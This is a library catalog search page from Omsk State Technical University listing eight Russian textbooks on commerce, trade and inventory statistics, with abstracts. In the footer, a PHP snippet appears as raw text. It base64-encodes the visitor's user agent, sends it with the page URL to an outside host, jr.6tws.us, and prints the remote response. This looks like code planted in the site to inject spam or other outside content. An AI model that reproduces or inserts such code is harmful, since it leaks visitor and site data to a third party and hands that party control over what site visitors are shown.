Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

53 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Товарный запас")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 8
1. 
Панкратов, Федор Григорьевич. Коммерческая деятельность [Текст] : Учеб. для вузов по специальности "Коммерция (Торговое дело)" / Ф. Г. Панкратов, 2004. - 503 с.
Держатели документа (Информация об экземплярах) 

В учебнике с учетом современных требований рассматривается организация коммерческой деятельности в сфере <товарного обращения>. Всесторонне и последовательно изложен широкий комплекс актуальных вопросов коммерческой деятельности: сущность и содержание коммерческой работы, ее развитие, <психология> и <этика> <коммерсанта>, коммерческая <информация> и ее <защита>. Организация хозяйственных связей с <поставщиками> и <покупателями> <товаров>, технология коммерческой работы по <закупке> и продаже товаров и др.

Специальные разделы учебника посвящены <биржевой> и <аукционной> торговле, <рекламно-информационной> деятельности по <сбыту> товаров, <экспортно-импортным> и <таможенным> операциям, <франчайзингу>, <лизингу>, коммерческим расчетам, организации коммерческой работы на <предприятиях> и ее эффективности и другим актуальным вопросам коммерции.

2. 
Бланк, Игорь Александрович. Торговый менеджмент [Текст] / И. А. Бланк, 2004. - 780 с.
3. 
Снегирева, Виктория. Розничный магазин. Управление ассортиментом по товарным категориям [Текст] / В. Снегирева, 2005. - 411 с.
4. 
Годин, Александр Михайлович. Статистика [Текст] : Учеб. для вузов по экон. специальностям и направлениям / А. М. Годин, 2003. - 470 с.
Держатели документа (Информация об экземплярах) 

В учебнике рассмотрены и изложены вопросы теории статистики и коммерческой статистики, вопросы статистической методологии привязаны к торгово-коммерческой деятельности различного рода предприятий, компаний, фирм и т. д. Подробно изложены следующие аспекты статистики: методы группировок, абсолютные и относительные величины, средние величины, ряды распределения, ряды динамики, выборочный метод наблюдения, индексы, измерение связи, графический метод, статистика розничного товарооборота, статистика покупательского спроса, статистика общественного питания, статистика товарных запасов, статистика труда и заработной платы, статистика издержек обращения. В конце каждой главы даны вопросы для повторения изученного материала.

Для студентов, менеджеров, экономистов, аспирантов, преподавателей экономических вузов, слушателей курсов повышения квалификации и бизнес-школ.

5. 
Половцева, Фаина Петровна. Коммерческая деятельность [Текст] : Учеб. для вузов по специальностям: "Коммерция", "Маркетинг", "Товароведение и экспертиза товаров", "Юриспруденция" со специализацией "Коммерческое право" и по направлению "Коммерция" / Ф. П. Половцева, 2003. - 246, [1] с.

В учебнике рассматриваются вопросы, связанные с организацией и развитием коммерческой деятельности <торговых> <предприятий> в условиях формирующихся рыночных отношений. Излагаются особенности <потребительского рынка>, методологические и организационные аспекты <коммерции>, <материально-техническое> и <информационное обеспечение>, технология <управления>, функционирование <розничной>, <оптовой> торговли и <торгово-посреднических структур> в новых условиях хозяйствования. Особое внимание уделяется результатам исследований, практическим рекомендациям и оценке коммерческой деятельности.

6. 
Торговое дело: экономика и организация [Текст] : Учеб. по специальности "Экономика и управление предприятиями торговли" / Л. А. Брагин, Т. П. Данько, Г. Г. Иванов, 1997. - 255 с.
7. 
Николайчук В. Е. Логистика в сфере распределения [Текст] / В. Е. Николайчук, 2001. - 158 с.
Ключевые слова 

В учебном пособии рассматриваются теоретические основы и практические рекомендации по управлению <материальными>, <информационными> и иными <потоками> на заключительном этапе производственного цикла - доведении готового <товара> до <потребителя>. Особое внимание уделяется взаимосвязи логистики и <маркетинга>, управлению логистическим сервисом и формированию логистических систем на макро- и микроуровне в сферах <распределения> и <обращения>.

8. 
Экономика торгового предприятия [Текст] : Учеб. для торговых вузов / А. И. Гребнев, Ю. К. Баженов, О. А. Габриэлян, 19971997. - 238 с.


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2965 - 23.07.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.13 с.12 запросов, 1.02c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;